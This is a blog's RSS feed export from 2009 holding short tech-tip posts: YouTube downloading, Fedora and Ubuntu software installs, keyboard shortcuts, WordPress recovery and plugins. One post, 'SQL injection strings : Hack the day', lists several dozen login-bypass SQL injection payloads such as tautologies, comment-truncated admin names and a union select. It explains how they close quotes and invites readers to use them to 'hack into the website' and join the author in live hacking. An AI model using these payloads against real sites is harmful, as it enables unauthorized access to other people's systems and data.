		<pubDate>Tue, 29 Dec 2009 16:42:31 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fun Zone]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[hack youtube]]></category>
		<category><![CDATA[kiss youtube]]></category>
		<category><![CDATA[youtube kiss]]></category>
		<category><![CDATA[youtube video download]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1418</guid>
		<description><![CDATA[If you want to have fun with the youtube video, than you can simply use the below tweak.. Suppose you want to download the video that you are currently watching. Its very easy. No need to use the site KEEPVID.COM or any other software to download the youtube videos. I will show you how to [...]]]></description>
			<content:encoded><![CDATA[<p>If you want to have fun with the youtube video, than you can simply use the below tweak..</p>
<p>Suppose you want to download the video that you are currently watching. Its very easy. No need to use the site <span style="color: #0000ff;">KEEPVID.COM</span> or any other software to download the youtube videos. <a href="http://openhippo.com/wp-content/uploads/2009/12/youtube-trick.jpg"><img class="alignright size-full wp-image-1419" title="youtube trick" src="http://openhippo.com/wp-content/uploads/2009/12/youtube-trick.jpg" alt="" width="124" height="93" /></a></p>
<p>I will show you how to use<strong> KISS</strong> word to download any video from youtube..</p>
<p><strong>Example</strong> : This below is the youtube video URL</p>
<p><a href="http://www.youtube.com/watch?v=2b3hFCIkGLc" target="_blank"><span style="color: #0000ff;">http://www.youtube.com/watch?v=2b3hFCIkGLc</span></a></p>
<p>To download this use the <strong>KISS</strong> before the youtube.com ,Like this</p>
<p><a href="http://www.kissyoutube.com/watch?v=2b3hFCIkGLc" target="_blank"><span style="color: #0000ff;">http://www</span>.<span style="color: #ff0000;"><strong>kiss</strong></span><span style="color: #0000ff;">youtube.com/watch?v=2b3hFCIkGLc</span></a></p>
<p>Just be sure that your PC is installed with the Java Run Time.</p>
<p>enjoy the youtube tip and trick.</p>
<p><img src="file:///C:/Users/Vikash/AppData/Local/Temp/moz-screenshot.jpg" alt="" /></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/download-youtube-video-kiss/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>VLC Free Video Editor</title>
		<link>http://openhippo.com/vlc-free-video-editor/</link>
		<comments>http://openhippo.com/vlc-free-video-editor/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 16:07:47 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[Gadgets]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[fedora video editor]]></category>
		<category><![CDATA[free video editor]]></category>
		<category><![CDATA[linux video editor]]></category>
		<category><![CDATA[video editor for ubuntu]]></category>
		<category><![CDATA[vlc video editor]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1411</guid>
		<description><![CDATA[The developers of VLC are going to launch the VLC video editor for the linux platforms, windows and mac. VLMC (VideoLAN Movie Creator) is a free video editing software, offering features to realize semi-professional quality movies, but with the aim to stay simple and user-friendly. VLMC will be available very soon in a pre-release version [...]]]></description>
			<content:encoded><![CDATA[<p>The developers of VLC are going to launch the VLC video editor for the linux platforms, windows and mac.</p>
<p>VLMC (<a href="http://vlmc.org/" target="_blank">VideoLAN Movie Creator</a>) is a free video editing software, <a href="http://openhippo.com/wp-content/uploads/2009/12/vlmc-medium.png"><img class="alignright size-full wp-image-1415" title="vlmc-medium" src="http://openhippo.com/wp-content/uploads/2009/12/vlmc-medium.png" alt="" width="101" height="109" /></a><br />
offering features to realize semi-professional quality movies,<br />
but with the aim to stay simple and user-friendly.</p>
<p>VLMC will be available very soon in a pre-release version for Linux, Windows and Mac, stay tuned !</p>
<p>You can fetch the current working tree using Git:<br />
git clone git://github.com/VLMC/vlmc.git</p>
<p>This is the initial PIC <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://openhippo.com/wp-content/uploads/2009/12/vlcm-video-editor.jpg"><img class="aligncenter size-medium wp-image-1412" title="vlcm video editor" src="http://openhippo.com/wp-content/uploads/2009/12/vlcm-video-editor-300x181.jpg" alt="" width="420" height="205" /></a></p>
<p>You can watch the Youtube Video of VLCM ( VLC video editor )&#8230;</p>
<p><a href="http://www.youtube.com/watch?v=02vdwNsvbZI">www.youtube.com/watch?v=02vdwNsvbZI</a></p>
<p>Thanks</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/vlc-free-video-editor/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Download free Windows 7 themes</title>
		<link>http://openhippo.com/download-free-windows-7-themes/</link>
		<comments>http://openhippo.com/download-free-windows-7-themes/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 14:56:30 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fun Zone]]></category>
		<category><![CDATA[Gallery]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[download free themes windows 7]]></category>
		<category><![CDATA[free windows 7 themes]]></category>
		<category><![CDATA[windows 7 themes]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1402</guid>
		<description><![CDATA[Personalization Gallery Download fun extras to give your PC a personal touch. If you are using windows 7, you might have gone through many good wallpapers. These are the default wallpapers which are inbuilt in the theme. I have done some of the tweak with the Personalization theme editor. Its fun.. You can download many [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Personalization Gallery</strong></p>
<p>Download fun extras to give your PC a personal touch.</p>
<p>If you are using windows 7, you might have gone through many good wallpapers. These are the default wallpapers which are inbuilt in the theme.<br />
I have done some of the tweak with the Personalization theme editor. Its fun..</p>
<p>You can download many other free themes provided by the Microsoft.</p>
<p>To download free windows 7 themes and wallpapers <a title="Download free windows 7 themes" href="http://windows.microsoft.com/en-US/windows/downloads/personalize" target="_blank">click here</a></p>
<p>In the windows gallery there are many types of themes: new themes, featured themes etc.</p>
<p>Have fun with new windows 7 free themes</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/download-free-windows-7-themes/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Install Adobe Flash Player in Fedora 12</title>
		<link>http://openhippo.com/install-adobe-flash-player-in-fedora-12/</link>
		<comments>http://openhippo.com/install-adobe-flash-player-in-fedora-12/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 17:09:55 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[fedora 12 flash player]]></category>
		<category><![CDATA[flash player in linux]]></category>
		<category><![CDATA[install adobe flash player]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1391</guid>
		<description><![CDATA[Installing Adobe Flash Player to fedora 12 is very much easy, it is a one line command to install that. Fedora 12 su -c 'yum install flash-plugin nspluginwrapper.x86_64 \ nspluginwrapper.i686 alsa-plugins-pulseaudio.i686 \ libcurl.i686']]></description>
			<content:encoded><![CDATA[<p>Installing Adobe Flash Player to fedora 12 is very much easy, it is a one line command to install that.</p>
<p><strong>Fedora 12</strong></p>
<pre><span style="color: #ff0000;">su -c 'yum install flash-plugin nspluginwrapper.x86_64 \
    nspluginwrapper.i686 alsa-plugins-pulseaudio.i686 \
    libcurl.i686'</span></pre>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/install-adobe-flash-player-in-fedora-12/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Install VLC in Fedora 12</title>
		<link>http://openhippo.com/install-vlc-in-fedora-12/</link>
		<comments>http://openhippo.com/install-vlc-in-fedora-12/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 08:23:54 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[fedora 12 vlc]]></category>
		<category><![CDATA[install vlc in fedora]]></category>
		<category><![CDATA[vlc install fedora]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1380</guid>
		<description><![CDATA[Its very easy to install VLC 1.0.3 or any new version of vlc in Fedora 12 ( Constantine). These are simple three steps you have to write in the Terminal of Linux. Opening the terminal :- System Tool &#8211; Terminal open it and paste the below three commands one by one.. vikash@vikash-desktop:~$ su root root@vikash-desktop:~$ [...]]]></description>
			<content:encoded><![CDATA[<p>Its very easy to install VLC 1.0.3 or any new version of vlc in Fedora 12 ( Constantine).</p>
<p>These are simple three steps you have to write in the Terminal of Linux.</p>
<p><strong>Opening the terminal :-</strong></p>
<p><strong>System Tool &#8211; Terminal </strong> open it and paste the below three commands one by one..</p>
<pre class="alt2" style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 60px; text-align: left;" dir="ltr">vikash@vikash-desktop:~$ <span style="color: #ff0000;"><strong>su root</strong></span>
root@vikash-desktop:~$ <strong><span style="color: #ff0000;">rpm -ivh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm</span></strong>
root@vikash-desktop:~$ <strong><span style="color: #ff0000;">yum install vlc</span></strong>
</pre>
<p>Thats It.</p>
<p><img class="aligncenter size-medium wp-image-1381" title="vlc" src="http://openhippo.com/wp-content/uploads/2009/12/vlc-300x208.jpg" alt="vlc" width="300" height="208" /><br />
Enjoy the Multimedia.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/install-vlc-in-fedora-12/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>SQL injection strings : Hack the day</title>
		<link>http://openhippo.com/sql-injection-strings-hack-the-day/</link>
		<comments>http://openhippo.com/sql-injection-strings-hack-the-day/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 07:37:35 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[enter into website]]></category>
		<category><![CDATA[hack a website]]></category>
		<category><![CDATA[sql attack]]></category>
		<category><![CDATA[sql injection strings]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1378</guid>
		<description><![CDATA[Here I am posting some of the SQL injection strings that you can use to hack into the website. I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me. If someone is pro of breaking into venerable systems and sites. please [...]]]></description>
			<content:encoded><![CDATA[<p>Here I am posting some of the SQL injection strings that you can use to hack into the website.</p>
<p>I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.</p>
<p>If someone is pro of breaking into venerable systems and sites. please share your expriences/</p>
<p style="text-align: center;">&#8216; or 0=0 &#8211;<br />
&#8216; or 0=0 &#8211;&#8217;<br />
&#8216; or 0=0 #<br />
&#8221; or 0=0 &#8211;<br />
&#8221; or 0=0 &#8211;&#8217;<br />
&#8216;&#8221;  or 0=0 &#8211;<br />
or 0=0 &#8211;<br />
&#8216; or 0=0 #<br />
&#8221; or 0=0 #<br />
or 0=0 #<br />
&#8216; or &#8216;x&#8217;='x<br />
&#8221; or &#8220;x&#8221;=&#8221;x<br />
&#8216;) or (&#8216;x&#8217;='x<br />
&#8221; or 1=1&#8211;<br />
or 1=1&#8211;<br />
&#8216; or a=a&#8211;&#8217;<br />
&#8216; or a=a #<br />
&#8216; or a=a&#8211;<br />
&#8216; or &#8220;a&#8221;=&#8221;a<br />
&#8216; or &#8216;a&#8217;='a<br />
&#8221; or &#8220;a&#8221;=&#8221;a<br />
&#8216;) or (&#8216;a&#8217;='a<br />
&#8220;) or (&#8220;a&#8221;=&#8221;a<br />
hi&#8221; or &#8220;a&#8221;=&#8221;a<br />
hi&#8221; or 1=1 &#8211;<br />
hi&#8217; or 1=1 &#8211;<br />
hi&#8217; or &#8216;a&#8217;='a<br />
hi&#8217;) or (&#8216;a&#8217;='a<br />
hi&#8221;) or (&#8220;a&#8221;=&#8221;a<br />
&#8216; or 1=1&#8211;<br />
&#8221; or 1=1&#8211;<br />
or 1=1&#8211;<br />
&#8216; or &#8216;a&#8217;='a<br />
&#8221; or &#8220;a&#8221;=&#8221;a</p>
<p style="text-align: center;">&#8216;) or (&#8216;a&#8217;='a</p>
<p style="text-align: center;">admin&#8217;&#8211;<br />
&#8216; or 1=1&#8211;<br />
&#8216;&#8221; or 1=1&#8211;<br />
&#8216; union select 1, &#8216;Eyeless&#8217;, &#8216;ez2do&#8217;, 1&#8211;<br />
admin&#8217;&#8211;<br />
administrator&#8217;&#8211;<br />
superuser&#8217;&#8211;<br />
test&#8217;&#8211;</p>
<p style="text-align: left;">This is the short list but these SQL injection strings are much powerful.</p>
<p style="text-align: left;"><strong>I have another hint :</strong></p>
<p style="text-align: left;">Some of the SQL supporting system doesn&#8217;t support.</p>
<p style="text-align: left;">For example<br />
&#8221; or &#8220;a&#8221;=&#8221;a<br />
&#8216;) or (&#8216;a&#8217;='a</p>
<p>on some databases one would work, other wouldn&#8217;t.. first one would enclose the username (or pass) in quotes&#8230; first it would CLOSE the quotes (making it &#8220;&#8221;) and then says.. or &#8220;a&#8221;=&#8221;a.. the last quote would be closeing the final a.. and &#8220;a&#8221;=&#8221;a&#8221; is always true, so that would be how it works<br />
however, the second uses (&#8216;Username&#8217;).. and changing it to say &#8220;(&#8221;) or (&#8216;a&#8217;='a&#8217;)&#8221;</p>
<p style="text-align: left;">
<p style="text-align: left;">Enjoy the HACK DAY <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/sql-injection-strings-hack-the-day/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Install FileZilla in Ubuntu : 1 Step</title>
		<link>http://openhippo.com/install-filezilla-in-ubuntu-1-step/</link>
		<comments>http://openhippo.com/install-filezilla-in-ubuntu-1-step/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 15:50:25 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Education]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[filezilla in ubuntu]]></category>
		<category><![CDATA[filezilla install linux]]></category>
		<category><![CDATA[install filezilla in ubuntu]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1374</guid>
		<description><![CDATA[FileZilla Client is a fast and reliable cross-platform FTP, FTPS and SFTP client with lots of useful features and an intuitive graphical user interface. Among others, the features of FileZilla include the following: * Easy to use * Supports FTP, FTP over SSL/TLS (FTPS) and SSH File Transfer Protocol (SFTP) * IPv6 support * Available [...]]]></description>
			<content:encoded><![CDATA[<p>FileZilla Client is a fast and reliable cross-platform FTP, FTPS and SFTP client with lots of useful features and an intuitive graphical user interface.</p>
<p>Among others, the features of FileZilla include the following:</p>
<p>* Easy to use<br />
* Supports FTP, FTP over SSL/TLS (FTPS) and SSH File Transfer Protocol (SFTP)<br />
* IPv6 support<br />
* Available in many languages<br />
* Supports resume and transfer of large files greater than 4GB<br />
* Powerful Site Manager and transfer queue<br />
* Bookmarks<br />
* Drag &amp; drop support<br />
* Configurable transfer speed limits<br />
* Filename filters<br />
* Network configuration wizard<br />
* Remote file editing<br />
* Keep-alive<br />
* HTTP/1.1, SOCKS5 and FTP-Proxy support<br />
* Logging to file</p>
<p><strong>Install Filezilla in Ubuntu</strong></p>
<p><span style="color: #ff0000;">sudo aptitude install filezilla</span></p>
<p>This will complete the installation<br />
<strong> Using Filezilla</strong><br />
If you want to open filezilla go to <strong>Applications&#8212;&gt;Internet&#8212;&gt;FileZilla</strong></p>
<p>Enjoy the TIP<strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/install-filezilla-in-ubuntu-1-step/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>10 Keyboard Shortcuts for Ubuntu Users</title>
		<link>http://openhippo.com/10-keyboard-shortcuts-for-ubuntu-users/</link>
		<comments>http://openhippo.com/10-keyboard-shortcuts-for-ubuntu-users/#comments</comments>
		<pubDate>Wed, 16 Dec 2009 13:20:05 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Education]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[ubuntu keyboard shortcuts]]></category>
		<category><![CDATA[ubuntu shortcuts]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1363</guid>
		<description><![CDATA[1. Switch to the next/previous workspace If you make use of the workspace very frequently, you can easily switch between different workspaces by pressing Ctrl + Alt + Left/Right Arrow. The Left key brings you to the previous workspace while the Right key brings you to the next adjacent. If you have enabled Compiz, you [...]]]></description>
			<content:encoded><![CDATA[<p><strong><img class="size-full wp-image-1367 alignleft" title="a" src="http://openhippo.com/wp-content/uploads/2009/12/a.jpg" alt="a" width="120" height="124" />1. Switch to the next/previous workspace</strong><br />
If you make use of the workspace very frequently, you can easily switch between different workspaces by pressing<strong> Ctrl + Alt + Left/Right Arrow</strong>. The Left key brings you to the previous workspace while the Right key brings you to the next adjacent. If you have enabled Compiz, you can even get it to show all the workspace by pressing Super + E on the keyboard.<br />
<strong>2. Move the current window to another workspace<br />
</strong>By pressing<strong> Shift+ Ctrl + Alt + Left/Right Arrow</strong>, you can easily move your current window to another workspace in the specified direction. This keyboard shortcut works very well with the one mentioned above. If you have the habit of opening many applications/windows when doing your work, but don’t like to see your desktop and menubar cluttered with all the application windows, you can use this shortcut key to move your applications to another workspace and get your desktop organized.<br />
<strong>3. Show the desktop<br />
</strong><strong>Ctrl + Alt + D</strong> enables you to quickly minimize all windows and give focus to the desktop. When all windows are minimized, this shortcut can also maximize all the windows to their previous state.<br />
<strong>4. Keyboard shortcut for the mouse right-click<br />
</strong>In most applications, you can always right-click on the mouse to access the options menu. On the keyboard, you can simply press <strong>Shift + F10</strong> to achieve this ‘right-click‘ effect<br />
<strong>5. Restart session and recover from crashes<br />
</strong>There are very few instances where Ubuntu will crash totally. But if it does, you can press <strong>Ctrl + Alt + Backspace</strong> to restart the session, and 90% of the time, it will recover from the crashes.<br />
<strong>6. Lock the screen quickly<br />
</strong>If you need to leave your workstation for a while, you can quickly lock up your screen by pressing <strong>Ctrl + Alt + L</strong> and prevent unauthorized access by others.<br />
<strong>7. Switch between windows in the reverse direction<br />
</strong><strong>Alt + Tab</strong> is a common shortcut key that allow you to switch between open windows. But do you know that by including the ‘Shift‘ button, you can reverse the windows switching direction? This is useful when you press <strong>Alt + Tab</strong> too fast and passed the window that you want to switch to. Simply press down the ‘Shift‘ button to go back to the previous window in the switch cycle.<br />
<strong>8. Move windows with arrow keys<br />
</strong>Press <strong>Alt+F7</strong> to activate the Move window function and use any arrows key (up, down, left, right) to move the window around the screen.<br />
<strong>9. Show hidden files<br />
</strong>Most of the time, you won’t need to view the hidden files in your home folder, but in the event that you need to, you can press <strong>Ctrl + H</strong> inside the Nautilus (the file manager for Ubuntu) to show all hidden files.<br />
<strong>10. Show file properties without right-clicking the mouse<br />
</strong>The conventional way to view a file/folder properties is to right-click the mouse and select ‘Properties‘. Now you can just press <strong>Alt + Enter</strong> to get the Properties window to appear.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/10-keyboard-shortcuts-for-ubuntu-users/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DOS Trick to find PC Serial No and Model No</title>
		<link>http://openhippo.com/dos-trick-to-find-pc-serial-no-and-model-no/</link>
		<comments>http://openhippo.com/dos-trick-to-find-pc-serial-no-and-model-no/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 04:25:00 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[dos trick]]></category>
		<category><![CDATA[find model no]]></category>
		<category><![CDATA[find serial no]]></category>
		<category><![CDATA[pc model no]]></category>
		<category><![CDATA[pc serial no]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1331</guid>
		<description><![CDATA[Some times you are may be eagar to know your machine serial number and model number. Its easy to find. There are many providers like IBM, Dell, Lenovo etc and some time you loose PC bill or board pack, and difficult to find out the serial no or model no. to report PC problem. So [...]]]></description>
			<content:encoded><![CDATA[<p>Some times you are may be eagar to know your machine serial number and model number. Its easy to find.</p>
<p>There are many providers like IBM, Dell, Lenovo etc and some time you loose PC bill or board pack, and difficult to find out the serial no or model no. to report PC problem.</p>
<p>So here is the DOS trick for that</p>
<p>&#8211; To retrieve serial number of the computer run the following command</p>
<p><span style="color: #ff0000;"><strong>wmic bios get serialnumber</strong></span></p>
<p>&#8211; To retrieve model name of the computer run the following command</p>
<p><span style="color: #ff0000;"><strong>wmic csproduct get name</strong></span></p>
<p><span style="color: #ff0000;"><span style="color: #333333;">Enjoy the trick</span><strong><br />
</strong></span></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/dos-trick-to-find-pc-serial-no-and-model-no/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Last 5 hours with WordPress: My Experience</title>
		<link>http://openhippo.com/last-5-hours-with-wordpress/</link>
		<comments>http://openhippo.com/last-5-hours-with-wordpress/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 17:42:37 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Education]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[big mistake]]></category>
		<category><![CDATA[last 5 hours]]></category>
		<category><![CDATA[my wordpress experience]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1325</guid>
		<description><![CDATA[Hah ! after 5 hours of struggling with my site database and wordpress, at last I did it. Today in afternoon, I was publishing some post and something gone wrong with site contents, probably it was wordpress failure or any tweak in the wordpress files. I got afraid : It was a blank page no [...]]]></description>
			<content:encoded><![CDATA[<p>Hah ! after 5 hours of struggling with my site database and wordpress, at last I did it.</p>
<p>Today in afternoon, I was publishing some post and something gone wrong with site contents, probably it was wordpress failure or any tweak in the wordpress files.</p>
<p>I got afraid : It was a blank page no source code,nothing a simple blank page,I didn&#8217;t know how, but i knew one thing that i m  in trouble . There were  lots of post and i was afraid of loosing my site.</p>
<p><img class="aligncenter size-full wp-image-1327" title="wordpress experience" src="http://openhippo.com/wp-content/uploads/2009/10/wordpress-experience.jpg" alt="wordpress experience" width="540" height="195" /></p>
<p>I went to bed and thought for 10 minutes, came back to my desk and started to check my site database, Huh ok, thank GOD My site database was there and it was OKK, so there i got one thing, that i have to reinstall wordpress.</p>
<p>Re-installing the wordpress and maintaining all plugins, themes tweaks and other was tedious. So I finally decided to reinstall the WordPress.</p>
<p>But before installing the WordPress, I had made backup of all the previous files and folders, exported the .sql (my site database) to my PC.</p>
<p>Finally i was having a nice clean and fresh space for the new wordpress installation, downloaded the wordpress.zip, uploaded to my directory and extracted. Here I played a new game, i created a new database name and username , because if any thinng go wrong will not effect to my previous DB. Just simple steps to install, and Done that.</p>
<p>But how to get all my previous post and stuff here in new wordpress instalation. I realized that i will be importing the previous blog DB to the new DB , I opened PhpMyAdmin and imported that,it takes about 5 min But it was success</p>
<p>Finally It was a nice experience with the wordpress and the Database handling <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Thank you WordPress.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/last-5-hours-with-wordpress/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Skype vs Google Talk</title>
		<link>http://openhippo.com/skype-vs-google-talk/</link>
		<comments>http://openhippo.com/skype-vs-google-talk/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 10:35:00 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Gadgets]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[gtalk feature]]></category>
		<category><![CDATA[skype features]]></category>
		<category><![CDATA[skype vs google talk]]></category>
		<category><![CDATA[skype vs gtalk]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1320</guid>
		<description><![CDATA[Did you see your email, your friend is asking to come online on ???????? SO here is the answer of that, what makes you to choose Skype or GTalk. There may be come or other differnece betwwen the two. First I will be providing best key features of Skype: 1. Skype is most recommended Chatting [...]]]></description>
			<content:encoded><![CDATA[<p>Did you see your email, your friend is asking to come online on ????????</p>
<p>SO here is the answer of that, what makes you to choose Skype or GTalk. There may be come or other differnece betwwen the two.</p>
<p><img class="aligncenter size-full wp-image-1321" title="skype vs gtalk" src="http://openhippo.com/wp-content/uploads/2009/10/skype-vs-gtalk.jpg" alt="skype vs gtalk" width="540" height="195" /></p>
<p>First I will be providing best key features of Skype:</p>
<p>1. Skype is most recommended Chatting ( text+audio+video) provider.</p>
<p>2. SkypeOut feature:- Skype users to call traditional telephone numbers, including mobile telephones, for a fee. This fee is as low as US$0.021 per minute for most developed countries.</p>
<p>3. Supports group Chats ( as IRC )</p>
<p>4. Sharing files and data.</p>
<p>5. Live streaming non stop video confrence.</p>
<p>There are many more like messaging, contact management, account management, SkypeIn etc.</p>
<p>Ok, Skype is mostly used in by the people who want to have a confrence ( video+audio ) and that also non stop. Skype streaming algorithm is best of all.</p>
<p>Now we are see the features of Google Talk ( Gtalk).</p>
<p>1. its reliable.</p>
<p>2. Gmail growth ( most of the email account user are GMAIL ) , so its ealy for them to choose the gmail inbuilt chat session.</p>
<p>3. New gmail also provide the video chatting.</p>
<p>4. Gtalk is simple there is no clustrring.</p>
<p>5. Very less features are available in Google Talk. ( No video confrence can be done in the Gtalk ).</p>
<p>The above are basic key features that we can distinguish upon.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/skype-vs-google-talk/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Newbie Guide: Important Plugins for WordPress Blogging</title>
		<link>http://openhippo.com/newbie-guide-important-plugin-for-wordpress-blogging/</link>
		<comments>http://openhippo.com/newbie-guide-important-plugin-for-wordpress-blogging/#comments</comments>
		<pubDate>Sat, 03 Oct 2009 03:29:08 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Education]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[important plugin for wordpress]]></category>
		<category><![CDATA[plugin guide]]></category>
		<category><![CDATA[plugin management]]></category>
		<category><![CDATA[plugion guide]]></category>
		<category><![CDATA[wordpress seo plugin]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1277</guid>
		<description><![CDATA[After the newie guide on the blogging in wordpress in my last post, now i would be guding you to use one of the best feature of wordpress, that is plugin management. There are many many good and effective plugin that you can use to make your work easier. The diffecrent plugin are use for [...]]]></description>
			<content:encoded><![CDATA[<p>After the newie guide on the blogging in wordpress in my last post, now i would be guding you to use one of the best feature of wordpress, that is plugin management. There are many many good and effective plugin that you can use to make your work easier. The diffecrent plugin are use for the different purpose. Like if you are a twitter,facebook or any other social media site user than you can directly use the pluign to manage your appereance on the blog, next is if you want that, when ever you write any post or made any changes in the blogÂ  and want to notify the seach engine (Google.com, yahoo.com, bing.com, ask.com etc) than you can use the plugin for that. Really its very easy, Thanks to opensource ( WordPress ).</p>
<p><img class="aligncenter size-full wp-image-1278" title="wordpress-plugin" src="http://openhippo.com/wp-content/uploads/2009/10/wordpress-plugin.gif" alt="wordpress-plugin" width="429" height="216" /></p>
<p>Below are the list of plugins and their uses and download links:-</p>
<p>1.<a href="http://wordpress.org/extend/plugins/google-sitemap-generator/" target="_blank"> Google XML Sitemap</a> :- This plugin will create a Google sitemaps compliant XML-Sitemap of your WordPress blog. It supports all of the WordPress generated pages as well as custom ones. Everytime you edit or create a post, your sitemap is updated and all major search engines that support the sitemap protocol, like ASK.com, Google, MSN Search and YAHOO, are notified about the update.</p>
<p>2. <a href="http://wordpress.org/extend/plugins/akismet/" target="_blank">Akismit</a> :-Akismet checks your comments against the Akismet web service to see if they look like spam or not. You need a WordPress.com API key to use it. You can review the spam it catches under &#8220;Comments.&#8221; To show off your Akismet stats just put  in your template.</p>
<p>3. <a href="http://wordpress.org/extend/plugins/all-in-one-seo-pack/" target="_blank">All In One SEO Pack</a> :- <strong>Optimizes</strong> your WordPress blog for Search Engines (<strong>Search Engine Optimization</strong>).</p>
<p>4. <a href="http://wordpress.org/extend/plugins/commentluv/" target="_blank">CommentLuv</a> :- This is a new plugin, but it is made for some Comment LUV purpose, This plugin ensure that when ever any user comment on your blog, its automatically added the link of the last post to the comment also, no bad way only gives the way to user to make his/her post appear in the comment.</p>
